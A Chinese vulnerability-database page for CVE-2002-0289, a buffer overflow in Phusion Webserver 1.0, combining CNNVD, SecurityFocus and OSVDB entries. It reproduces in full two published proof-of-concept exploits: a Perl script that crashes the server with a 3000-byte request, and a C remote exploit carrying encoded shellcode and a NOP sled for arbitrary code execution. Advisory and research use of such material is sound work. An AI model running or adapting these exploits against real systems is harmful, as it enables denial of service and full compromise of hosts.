CVE-2002-0289
CVSS5.0
发布时间 :2002-05-31 00:00:00
修订时间 :2016-10-17 22:18:26
NMCOES    

[原文]Buffer overflow in Phusion web server 1.0 allows remote attackers to cause a denial of service and execute arbitrary code via a long HTTP request.


[CNNVD]Phusion Webserver超长URL引起缓冲区溢出漏洞(CNNVD-200205-126)

        
        Phusion Webserver是一个商业的HTTP服务器,它运行于Microsoft Windows平台。
        Phusion Webserver存在一个缓冲区溢出漏洞。
        Phusion Webserver没有对额外提交的数据进行充分的边界检查。所以一个远程攻击者提交一个超长的web请求将引起堆变量被攻击者提交的数据结构覆盖。
        Microsoft Windows平台上的web服务器通常以SYSTEM权限运行,这将使攻击者可以完全控制目标主机。
        这个缓冲区溢出问题同样能引起拒绝服务攻击。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0289
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0289
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200205-126
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=101408906001958&w=2
(UNKNOWN)  BUGTRAQ  20020217 Phusion-Webserver-v1.0-Bugs&Exploits-Remotes
http://www.securityfocus.com/bid/4118
(UNKNOWN)  BID  4118
http://www.securityfocus.com/bid/4119
(UNKNOWN)  BID  4119

- 漏洞信息

Phusion Webserver超长URL引起缓冲区溢出漏洞
中危 边界条件错误
2002-05-31 00:00:00 2005-10-20 00:00:00
远程  
        
        Phusion Webserver是一个商业的HTTP服务器,它运行于Microsoft Windows平台。
        Phusion Webserver存在一个缓冲区溢出漏洞。
        Phusion Webserver没有对额外提交的数据进行充分的边界检查。所以一个远程攻击者提交一个超长的web请求将引起堆变量被攻击者提交的数据结构覆盖。
        Microsoft Windows平台上的web服务器通常以SYSTEM权限运行,这将使攻击者可以完全控制目标主机。
        这个缓冲区溢出问题同样能引起拒绝服务攻击。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 暂时停止使用此Web服务器软件。
        厂商补丁:
        BBShareware.Com
        ---------------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.bbshareware.com/phusion/

- 漏洞信息 (21293)

Phusion Webserver 1.0 Long URL Denial Of Service Vulnerability (EDBID:21293)
windows dos
2002-02-16 Verified
0 Alex Hernandez
N/A [点击下载]
source: http://www.securityfocus.com/bid/4118/info

Phusion Webserver is a commercial HTTP server that runs on Microsoft Windows 9x/NT/2000 operating systems.

It is possible for a remote attacker to deny service to legitimate users of the service by submitting an excessively long web request (approximately 3000+ bytes).

It should be noted that this issue is due to a remotely exploitable buffer overflow condition. 

#!/usr/bin/perl
#
# Simple script to send a long 'A^s' command to the server, 
# resulting in the server crashing.
#
# Phusion Webserver v1.0 proof-of-concept exploit.
# By Alex Hernandez <al3xhernandez@ureach.com> (C)2002.
#
# Thanks all the people from Spain and Argentina.
# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins, 
# G.Maggiotti & H.Oliveira.
# 
#
# Usage: perl -x Phusion_DoS.pl -s <server>
#
# Example: 
#
# perl -x Phusion_DoS.pl -s 10.0.0.1
# 
# Crash was successful !
#

use Getopt::Std;
use IO::Socket;

print("\nPhusion Webserver v1.0 DoS exploit (c)2002.\n");
print("Alex Hernandez al3xhernandez\@ureach.com\n\n");

getopts('s:', \%args);
if(!defined($args{s})){&usage;}

($serv,$port,$def,$num,$data,$buf,$in_addr,$paddr,$proto);

$def = "A";
$num = "3000";
$data .= $def x $num;
$serv = $args{s};
$port = 80;
$buf = "GET /cgi-bin/$data /HTTP/1.0\r\n\r\n";


$in_addr = (gethostbyname($serv))[4] || die("Error: $!\n");
$paddr = sockaddr_in($port, $in_addr) || die ("Error: $!\n");
$proto = getprotobyname('tcp') || die("Error: $!\n");

socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!");
connect(S, $paddr) ||die ("Error: $!");
select(S); $| = 1; select(STDOUT);
print S "$buf";


print("\nCrash was successful !\n\n");

sub usage {die("\n\nUsage: perl -x $0 -s <server>\n\n");}
		

- 漏洞信息 (21294)

Phusion Webserver 1.0 Long URL Buffer Overflow Vulnerability (EDBID:21294)
windows remote
2002-02-16 Verified
0 Alex Hernandez
N/A [点击下载]
source: http://www.securityfocus.com/bid/4119/info

Phusion Webserver is a commercial HTTP server that runs on Microsoft Windows 9x/NT/2000 operating systems.

Phusion Webserver does not perform sufficient bounds checking of externally supplied data. As a result, it is possible for a remote attacker to submit an excessively long web request which may cause stack variables to be overwritten with attacker-supplied instructions.

As webservers normally run with SYSTEM privileges on Microsoft Windows operating systems, this may result in a full compromise of a host running the vulnerable software.

It should be noted that this unchecked buffer may also be exploited to cause a denial of service condition.

/** Phusion-Overun.c 
** -Remote exploit for Phusion Webserver v1.0 for WinNT.
**
** Phusion Webserver v1.0 exploit gets remote servers's full control.
** When you attacks a vulnerable server you can run abitrary code
** inside.
**
** Phusion Webserver v1.0 proof-of-concept exploit.
** By Alex Hernandez <al3xhernandez@ureach.com> (C)2002.
**
** Thanks all the people from Spain and Argentina.
** Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins, 
** G.Maggiotti & H.Oliveira.
** 
**
** Compile: gcc -o Phusion-ovrun Phusion-ovrun.c
**
** Usage: ./Phusion-ovrun <hostname>
**
**
** 
**
**/


#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/errno.h>
#include <netdb.h>

#define _PORT   80
#define _X 10000

char runcrash[] =
"GET /"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x81\xc7\xc8\x10\x10\x10\x81\xef\x10"
"\x10\x10\x10\x57\x5e\x33\xc0\x66\xb8\x31\x02\x90\x90\x50"
"\x59\xac\x34\x99\xaa\xe2\xfa\x71\x99\x99\x99\x99\xc4\x18"
"\x74\xb1\x89\xd9\x99\xf3\x99\xf1\x19\x99\x99\x99\xf3\x9b"
"\xf3\x99\xf3\x99\xf1\x99\x99\x99\xd9\x14\x2c\xac\x8b\xd9"
"\x99\xcf\xf1\x19\x02\xd4\x99\xc3\x66\x8b\xc9\xc2\xf3\x99"
"\x14\x24\x3a\x89\xd9\x99\xaa\x59\x32\x14\x2c\x3a\x89\xd9"
"\x99\xcf\xf1\xd3\x98\x99\x99\x09\x14\x2c\x72\x89\xd9\x99"
"\xcf\xca\xf1\x49\x05\xd4\x99\xc3\x66\x8b\xca\xf1\x05\x02"
"\xd4\x99\xc3\x66\x8b\xf1\xa9\xd4\xde\x99\xc6\x14\x2c\x3e"
"\x89\xd9\x99\xf3\xdd\x09\x09\x09\x09\xc0\x35\x33\x7b\x65"
"\xf3\x99\x23\x31\x02\xd4\x99\x66\x8b\x99\x99\x99\x99\xca"
"\xfc\xeb\xef\xfc\xeb\xb9\xf1\xf8\xfa\xf2\xfc\xfd\xb7\xa5"
"\xb6\xf1\xab\xa7\xf1\xed\xed\xe9\xa3\xb6\xb6\xee\xee\xee"
"\xb7\xfd\xfc\xfc\xe9\xe3\xf6\xf7\xfc\xb7\xf6\xeb\xfe\xb9"
"\xb9\xca\xe9\xf5\xf6\xf0\xed\xb9\xfa\xf6\xfd\xfc\xfd\xb9"
"\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb9\xe4\xa3\xb0\xa5\xf1\xed"
"\xf4\xf5\xa7\xa5\xf1\xfc\xf8\xfd\xa7\xa5\xed\xf0\xed\xf5"
"\xfc\xa7\xca\xfc\xeb\xef\xfc\xeb\xb9\xf1\xf8\xfa\xf2\xfc"
"\xfd\xb7\xa5\xb6\xed\xf0\xed\xf5\xfc\xa7\xa5\xb6\xf1\xfc"
"\xf8\xfd\xa7\xa5\xfb\xf6\xfd\xe0\xa7\xa5\xfa\xfc\xf7\xed"
"\xfc\xeb\xa7\xd1\xfc\xf5\xf5\xf6\xb7\xb9\xc0\xf6\xec\xb9"
"\xf8\xeb\xfc\xb9\xeb\xec\xf7\xf7\xf0\xf7\xfe\xb9\xf8\xb9"
"\xc3\xdb\xca\xfc\xeb\xef\xfc\xeb\xb9\xc9\xcb\xd6\xea\xb9"
"\xfb\xec\xfe\xfe\xe0\xb9\xef\xfc\xeb\xea\xf0\xf6\xf7\xb9"
"\xf8\xf7\xfd\xb9\xe0\xf6\xec\xb9\xf1\xf8\xef\xfc\xb9\xfb"
"\xfc\xfc\xf7\xb9\xf8\xfb\xec\xea\xfc\xfd\xb7\xa5\xe9\xa7"
"\xd4\xf6\xeb\xfc\xb9\xf0\xf7\xff\xf6\xeb\xf4\xf8\xed\xf0"
"\xf6\xf7\xb9\xfa\xf8\xf7\xb9\xfb\xfc\xb9\xfd\xf6\xee\xf7"
"\xf5\xf6\xf8\xfd\xb9\xff\xeb\xf6\xf4\xb9\xf1\xed\xed\xe9"
"\xa3\xb6\xb6\xee\xee\xee\xb7\xfd\xfc\xfc\xe9\xe3\xf6\xf7"
"\xfc\xb7\xf6\xeb\xfe\xb9\xf6\xeb\xb9\xf1\xed\xed\xe9\xa3"
"\xb6\xb6\xf4\xf8\xeb\xfc\xf8\xea\xef\xf0\xef\xf8\xea\xb7"
"\xfa\xf3\xfb\xb7\xf7\xfc\xed\xa5\xe9\xa7\xeb\xfc\xfe\xf8"
"\xeb\xfd\xea\xb9\xed\xf6\xb9\xdd\xfc\xfc\xe9\xc3\xf6\xf7"
"\xfc\xb9\xfa\xeb\xfc\xee\xb9\xb1\xcd\xf1\xfc\xce\xf0\xe3"
"\xf8\xeb\xfd\xb5\xb9\xd8\xf7\xec\xea\xf2\xf8\xb9\xf8\xf7"
"\xfd\xb9\xd7\xfc\xf4\xf6\xb0\xa5\xe9\xa7\xda\xf6\xfd\xfc"
"\xfd\xb9\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb7\xa5\xb6\xfa\xfc"
"\xf7\xed\xfc\xeb\xa7\xa5\xb6\xfb\xf6\xfd\xe0\xa7\xa5\xb6"
"\xf1\xed\xf4\xf5\xa7\xb7\xc5\xf1\xed\xf4\xf5\xc5\xca\xfc"
"\xeb\xef\xfc\xeb\xd8\xfb\xec\xea\xfc\xfd\xfb\xe0\xf0\xc3"
"\xf8\xf7\xb7\xf1\xed\xf4\xf5\x99\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\xac\xe0\xe3\x01";


int     sock;
struct  sockaddr_in sock_a;
struct  hostent *host;

int main (int argc, char *argv[]) {

printf("\nWinNT 4.0 sp5 Phusion Webserver v1.0 BufferOverrun exploit\n");
printf("Alex Hernandez al3xhernandez@ureach.com\n\n");

if(argc < 2) {
   fprintf(stderr, "Error : Usage: %s <hostname> \n", argv[0]);
   exit(0);
  }


if((host=(struct hostent *)gethostbyname(argv[1])) == NULL) {
    perror("gethostbyname");
    exit(-1);
  }

if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
    perror("create socket");
    exit(-1);
  }

sock_a.sin_family=AF_INET;
sock_a.sin_port=htons(_PORT);
memcpy((char *)&sock_a.sin_addr,(char *)host->h_addr,host->h_length);
if(connect(sock,(struct sockaddr *)&sock_a,sizeof(sock_a))!=0) {
    perror("create connect");
    exit(-1);
  }

  fflush(stdout);

  write(sock,runcrash,_X);
  write(sock,"\n\n", 2);
  printf("done.\n\n");

}


		

- 漏洞信息

9000
Phusion Malformed URL Parsing Remote DoS
Remote / Network Access Denial of Service
Loss of Availability Solution Unknown
Exploit Public Third-party Verified

- 漏洞描述

- 时间线

2002-02-16 Unknow
2002-02-16 Unknow

- 解决方案

OSVDB is not aware of a solution for this vulnerability.

- 相关参考

- 漏洞作者

- 漏洞信息

Phusion Webserver Long URL Buffer Overflow Vulnerability
Boundary Condition Error 4119
Yes No
2002-02-16 12:00:00 2009-07-11 10:56:00
This issue was submitted to BugTraq on February 16th, 2002 by Alex Hernandez <al3xhernandez@ureach.com>.

- 受影响的程序版本

BBShareware.Com Phusion Webserver 1.0
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0

- 漏洞讨论

Phusion Webserver is a commercial HTTP server that runs on Microsoft Windows 9x/NT/2000 operating systems.

Phusion Webserver does not perform sufficient bounds checking of externally supplied data. As a result, it is possible for a remote attacker to submit an excessively long web request which may cause stack variables to be overwritten with attacker-supplied instructions.

As webservers normally run with SYSTEM privileges on Microsoft Windows operating systems, this may result in a full compromise of a host running the vulnerable software.

It should be noted that this unchecked buffer may also be exploited to cause a denial of service condition.

- 漏洞利用

The following proof-of-concept was provided by Alex Hernandez &lt;al3xhernandez@ureach.com&gt;:

- 解决方案

Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站